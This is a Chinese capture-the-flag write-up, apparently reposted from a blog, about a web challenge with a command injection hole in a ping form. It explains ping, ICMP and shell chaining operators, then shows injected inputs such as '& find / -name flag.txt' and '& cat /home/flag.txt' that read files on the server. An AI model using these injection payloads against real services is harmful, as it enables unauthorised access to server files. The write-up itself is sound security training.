标签：web ICMP ping 命令 flag command txt execution com

题目

 

考查知识

命令执行漏洞的了解

ping相关知识

waf相关知识

命令拼接

ping命令相关知识

ICMP协议是“Internet Control Message Protocol”（因特网控制消息协议）的缩写。它是TCP/IP协议族的一个子协议，用于在IP主机、路由器之间传递控制消息。

 

ping (Packet Internet Groper)，因特网包探索器，用于测试网络连接量的程序。Ping发送一个“ICMP回声请求消息”给目的地并报告是否收到所希望的ICMP echo （ICMP回声应答）。它是用来检查网络是否通畅或者网络连接速度的命令

 

ping命令通常用来作为网络可用性的检查。ping命令可以对一个网络地址发送测试数据包，看该网络地址是否有响应并统计响应时间，以此测试网络。

 

ping和ICMP的关系：ping命令发送数据使用的是ICMP协议。

&& 命令拼接 相关知识

命令拼接符
|、||、&、&&的区别：
&：无论左边是false还是true，右边都执行
&&：具有短路效果，左边是false，右边不执行。
|:无论左边是false还是true，右边都会执行
||：具有短路效果，左边是true，右边不执行。

 

在Linux中执行 ping www.baidu.com && ls

能看到，两条命令都被执行了

 

waf相关知识

请移步这篇文章

https://mp.weixin.qq.com/s?__biz=MzU4NjY0NTExNA==&mid=2247483729&idx=1&sn=599fabde18408d79006692d3a74a8ebd&chksm=fdf96a44ca8ee3520f10afc421bb3e336aa78d560290099e4749ada9f51cee017a789e96f778&scene=21#wechat_redirect

命令执行漏洞相关知识

 移步这篇文章

https://blog.csdn.net/LYJ20010728/article/details/117349106

获取场景

 

 

思路

题目是命令执行漏洞，我们直接拼接一个命令 ping www.baidu.com & ls

发现当前目录夏，只有index.php，没有flag.txt，先找flag.txt在那个目录下面

 

 

ping www.baidu.com & find / -name flag.txt

找到了flag.txt的路径

 

 

查看flag.txt的内容

ping www.baidu.com & cat /home/flag.txt，拿到flag

 

 

标签：web,ICMP,ping,命令,flag,command,txt,execution,com
来源： https://www.cnblogs.com/I-dont-have-a-home-yet/p/16422908.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。